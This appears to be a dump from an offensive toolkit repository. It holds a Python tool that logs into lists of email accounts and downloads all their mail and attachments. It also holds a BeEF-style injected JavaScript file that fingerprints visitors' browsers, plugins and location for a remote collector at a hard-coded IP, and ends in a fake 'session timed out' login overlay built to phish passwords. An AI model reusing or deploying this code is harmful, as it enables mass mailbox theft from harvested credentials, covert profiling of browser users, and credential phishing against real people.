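        # a server that already dropped the connection must not mask the
        # exception that got us here.
        try:
            Mailbox.quit()
        except (poplib.error_proto, socket.error):
            pass


def connectMailboxIMAP(username,password,imapserver,SSL):
    """Download every non-deleted message from every folder of an IMAP account.

    Folders are mirrored under ``emails_dir + "emails/<username>/<folder>"``
    and each message is written there under its UID via fetch_email(), which
    also stores the attachments.  Messages already on disk are not fetched
    again.

    Args:
        username: mailbox login; also used as the on-disk folder name.
        password: mailbox password.
        imapserver: IMAP host name.
        SSL: passed to IMAPClient; True for IMAPS, False for plain IMAP.

    Raises:
        IMAPClient and socket errors on connection, login or folder failure.
    """
    print "[*] Accessing: "+imapserver+" - "+username

    # One IMAPClient session is enough; the old code also logged in a second
    # time through imaplib.IMAP4_SSL (always TLS, even when SSL was False)
    # and never used that connection.
    server = IMAPClient(imapserver, use_uid=True, ssl=SSL)
    server.login(username,password)
    try:
        userDir = emails_dir+"emails/"+username
        for folder in server.list_folders():
            folderName = folder[2]
            # Folder names come from the server; keep them inside userDir.
            emailPath = _containedPath(userDir, folderName)
            if emailPath is None:
                print "[-] Rejecting unsafe folder name: "+repr(folderName)
                continue
            if not os.path.exists(emailPath):
                os.makedirs(emailPath)

            # NOTE(review): a folder that cannot be selected makes
            # select_folder() raise and abort the whole account, as in the
            # original (its try/except was commented out).
            server.select_folder(folderName)
            messages = server.search(['NOT DELETED'])

            print "[+] Downloading from '"+str(folderName).strip()+"' folder: "+str(len(messages))+" email(s) - "+username
            for msg in messages:
                att_path = os.path.join(emailPath, str(msg))
                if os.path.exists(att_path):
                    if verbose==True:
                        print "[-] Skipping "+att_path
                    continue
                # Only fetch what is not on disk yet.
                msgbody=fetch_email(server,msg,username)
                if msgbody!=None and len(msgbody)>0:
                    if verbose==True:
                        print "[+] Saving emails: "+att_path
                    with open(att_path, 'wb') as fp:
                        fp.write(msgbody)
    finally:
        server.logout()


# Probe order for a domain's mail service.  TLS ports are tried before their
# plaintext counterparts so that credentials are not sent in the clear when
# a server offers both (the original let a later plaintext hit override an
# earlier TLS hit), and IMAPS is probed on 993 rather than 465 (SMTPS).
_MAIL_SERVICE_PROBES = (
    ('imap', 'imap.', 993, True),
    ('imap', 'imap.', 143, False),
    ('pop', 'pop3.', 995, True),
    ('pop', 'pop3.', 110, False),
    ('pop', 'pop.', 995, True),
    ('pop', 'pop.', 110, False),
)


def _findMailServer(domain):
    """Return (protocol, host, useSSL) for the first reachable service of *domain*.

    protocol is 'imap' or 'pop'; ('', '', False) when nothing answered.
    """
    for protocol, prefix, port, useSSL in _MAIL_SERVICE_PROBES:
        host = prefix+domain
        if isOpen(host, port):
            return protocol, host, useSSL
    return '', '', False


def _startDownload(jobs, username, password):
    """Locate the mail service for *username* and start a worker process for it.

    Appends the started multiprocessing.Process to *jobs*.  Prints a message
    and does nothing when the address has no domain part or no service
    answered.
    """
    if '@' not in username:
        print "[-] Not an email address, skipping: "+username
        return
    uname,domain = username.split('@', 1)
    print "[*] Checking: "+username

    protocol, host, useSSL = _findMailServer(domain)
    if protocol == 'pop':
        target = connectMailboxPOP
    elif protocol == 'imap':
        target = connectMailboxIMAP
    else:
        print "[-] No POP3/IMAP service found for "+domain
        return
    p = multiprocessing.Process(target=target, args=(username,password,host,useSSL,))
    jobs.append(p)
    p.start()


def checkEmailServer():
    """Download the mailboxes named by the globals USERNAME/PASSWORD and INPUTFILE.

    One worker process is started per account (see _startDownload) and all
    workers are waited for before returning.  INPUTFILE lines have the form
    "<email> <password>"; blank lines are ignored and malformed ones are
    reported and skipped instead of raising.
    """
    jobs = []

    # Both must be present; the old `or` test went on to split an empty USERNAME.
    if len(USERNAME)>0 and len(PASSWORD)>0:
        _startDownload(jobs, USERNAME, PASSWORD)

    if len(INPUTFILE)>0:
        with open(INPUTFILE) as f:
            accounts = f.readlines()
        for account in accounts:
            account = account.strip()
            if len(account)==0:
                continue
            # Split once so a password containing spaces survives.
            fields = account.split(None, 1)
            if len(fields)!=2:
                print "[-] Malformed line in "+INPUTFILE+", expected '<email> <password>': "+account
                continue
            username,password = fields
            _startDownload(jobs, username, password)

    for p in jobs:
        p.join()

if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(__file__)
    parser = argparse.ArgumentParser(description="Emails are saved to [current-dir]/result/emails/[email-address] folder. 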
Attachments are saved to [current-dir]/result/attachments/[email-address] folder.") 313 | parser.add_argument('-u','--user', help='Email address', required=False) 314 | parser.add_argument('-p','--pass', help='Email account password', required=False) 315 | parser.add_argument('-f','--file', help='File containing list of email accounts', required=False) 316 | parser.add_argument('-d','--dest', help='Location to save downloaded emails', required=False) 317 | #parser.add_argument('-s','--search', help='Search emails for passwords and credit cards', action='store_true') 318 | parser.add_argument('-v','--verbose', help='Enable verbose mode', action='store_true') 319 | args = vars(parser.parse_args()) 320 | 321 | #if args['search']!=None: 322 | # SEARCH = True 323 | # if SEARCH==True: 324 | # for text in searchText: 325 | # searchthis(emails_dir, text) 326 | if args['verbose']: 327 | verbose=True 328 | if args['dest']!=None: 329 | emails_dir = args['dest']+"/emails/" 330 | if not os.path.exists(emails_dir): 331 | os.makedirs(emails_dir) 332 | if args['user']!=None and args['pass']!=None: 333 | USERNAME = args['user'] 334 | PASSWORD = args['pass'] 335 | checkEmailServer() 336 | if args['file']!=None: 337 | INPUTFILE = args['file'] 338 | checkEmailServer() 339 | 340 | -------------------------------------------------------------------------------- /mitm/beefclone.js: -------------------------------------------------------------------------------- 1 | var geolocation = ""; 2 | var browserVer = ""; 3 | var userAgent = ""; 4 | 5 | function browserVersion(){ 6 | var browser = ''; 7 | var browserVersion = 0; 8 | if (/Opera[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 9 | browser = 'Opera'; 10 | } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)) { 11 | browser = 'MSIE'; 12 | } else if (/Navigator[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 13 | browser = 'Netscape'; 14 | } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 15 | browser = 'Chrome'; 16 | } 
else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {
    browser = 'Safari';
    // Run only for its side effect: it leaves the Safari version number in
    // RegExp.$1 (a legacy, non-standard static property).
    /Version[\/\s](\d+\.\d+)/.test(navigator.userAgent);
    browserVersion = new Number(RegExp.$1);
} else if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {
    browser = 'Firefox';
}
// Every non-Safari branch relies on RegExp.$1 still holding the capture
// from the last successful .test() above; if no pattern matched, $1 is
// whatever the last successful regex anywhere on the page captured.
if(browserVersion === 0){
    browserVersion = parseFloat(new Number(RegExp.$1));
}
browserVer ="browser="+browser+"&browserVersion="+browserVersion;
userAgent = "&userAgent="+navigator.userAgent;
}

// Success callback for navigator.geolocation.getCurrentPosition (see
// getLocation): stores the coordinates in the global `geolocation`
// query-string fragment, then runs the browser/plugin survey.
function showLocation(position) {
    var latitude = position.coords.latitude;
    var longitude = position.coords.longitude;
    geolocation = "&latitude="+latitude+"&longitude="+longitude;
    //alert("Latitude : " + latitude + " Longitude: " + longitude);
    getVersion();
}

// Builds and returns the survey query string: browser name/version and user
// agent (from browserVersion()), `visits`, and the version strings reported
// by PluginDetect for each plugin listed below.  PluginDetect is not defined
// in this file; the page is expected to load it.
// NOTE(review): `visits` is not declared anywhere in the visible file (its
// declaration is commented out below), so the `&visits=` line throws a
// ReferenceError unless another script defines it.  `geolocation` (set by
// showLocation) and `referer` are never appended to the output.  The upload
// to the collector is commented out; the string is only returned.
function getVersion(){
    browserVersion();

    //var tz = jstz.determine();
    //var timezone = "&timezone="+tz.name();

    //var visits = visits;
    var referer = document.referrer;   // read but not used
    var qtversion = PluginDetect.getVersion("quicktime");
    var axversion = PluginDetect.getVersion("activex");
    var flashversion = PluginDetect.getVersion("flash");
    var ieversion = PluginDetect.getVersion("iecomponent");
    var javaversion = PluginDetect.getVersion("java");
    var pdfjsversion = PluginDetect.getVersion("pdfjs");
    var pdfreaderversion = PluginDetect.getVersion("pdfreader");
    var realplayerversion = PluginDetect.getVersion("realplayer");
    var shockwaveversion = PluginDetect.getVersion("shockwave");
    var silverlightversion = PluginDetect.getVersion("silverlight");
    var vlcversion = PluginDetect.getVersion("vlc");
    var windowsmpversion = PluginDetect.getVersion("windowsmediaplayer");

    var output = "";
    output += browserVer;
    output += userAgent;
    output += "&visits="+visits;
    output += "&qtversion="+qtversion;
    output += "&axversion="+axversion;
    output += "&flashversion="+ flashversion;
    output += "&ieversion="+ ieversion;
    output += "&javaversion="+ javaversion;
    output += "&pdfjsversion="+ pdfjsversion;
    output += "&pdfreaderversion="+ pdfreaderversion;
    output += "&realplayerversion="+ realplayerversion;
    output += "&shockwaveversion="+ shockwaveversion;
    output += "&silverlightversion="+ silverlightversion;
    output += "&vlcversion="+ vlcversion;
    output += "&windowsmpversion="+ windowsmpversion;
    return output;

    // $.ajax({
    //     type: "GET",
    //     url: "http://96.126.106.188:8888/bin/process",
    //     data: output,
    //     success: function() {
    //     }
    // });

}

// Error callback for getCurrentPosition.  Both handled codes (1 = permission
// denied, 2 = position unavailable) are swallowed silently; other codes fall
// through with no action either.
function errorHandler(err) {
    if(err.code == 1) {
        //alert("Error: Access is denied!");
    }else if( err.code == 2) {
        //alert("Error: Position is unavailable!");
    }
}
// Entry point for the location prompt: asks the browser for the current
// position (showLocation on success, errorHandler on failure) with a 60 s
// timeout, or alerts when the Geolocation API is absent.  Note that the
// survey in getVersion() only runs if the user grants location access.
function getLocation(){
    if(navigator.geolocation){
        // timeout at 60000 milliseconds (60 seconds)
        var options = {timeout:60000};
        navigator.geolocation.getCurrentPosition(showLocation,
                                                 errorHandler,
                                                 options);

    }else{
        alert("Sorry, browser does not support geolocation!");
    }
}

var answer= '';   // not referenced in the visible part of this file
function grayOut(vis, options) {
    var options = options || {};
    var zindex = options.zindex || 50;
    var opacity = options.opacity || 70;
    var opaque = (opacity / 100);
    var bgcolor = options.bgcolor || '#000000';
    var dark=document.getElementById('darkenScreenObject');
    if (!dark) {
        var tbody = document.getElementsByTagName("body")[0];
        var tnode = document.createElement('div');             // Create the layer.
118 | tnode.style.position='absolute'; // Position absolutely 119 | tnode.style.top='0px'; // In the top 120 | tnode.style.left='0px'; // Left corner of the page 121 | tnode.style.overflow='hidden'; // Try to avoid making scroll bars 122 | tnode.style.display='none'; // Start out Hidden 123 | tnode.id='darkenScreenObject'; // Name it so we can find it later 124 | tbody.appendChild(tnode); // Add it to the web page 125 | dark=document.getElementById('darkenScreenObject'); // Get the object. 126 | } 127 | if (vis) { 128 | var pageWidth='100%'; 129 | var pageHeight='100%'; 130 | dark.style.opacity=opaque; 131 | dark.style.MozOpacity=opaque; 132 | dark.style.filter='alpha(opacity='+opacity+')'; 133 | dark.style.zIndex=zindex; 134 | dark.style.backgroundColor=bgcolor; 135 | dark.style.width= pageWidth; 136 | dark.style.height= pageHeight; 137 | dark.style.display='block'; 138 | } else { 139 | dark.style.display='none'; 140 | } 141 | } 142 | 143 | // CURRENTLY NOT USED 144 | // Send done prompt to user 145 | function win(){ 146 | document.getElementById('popup').innerHtml='' + messagewords + '
| Email: | |
Password: |
For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.
| Username: | |
| Password: |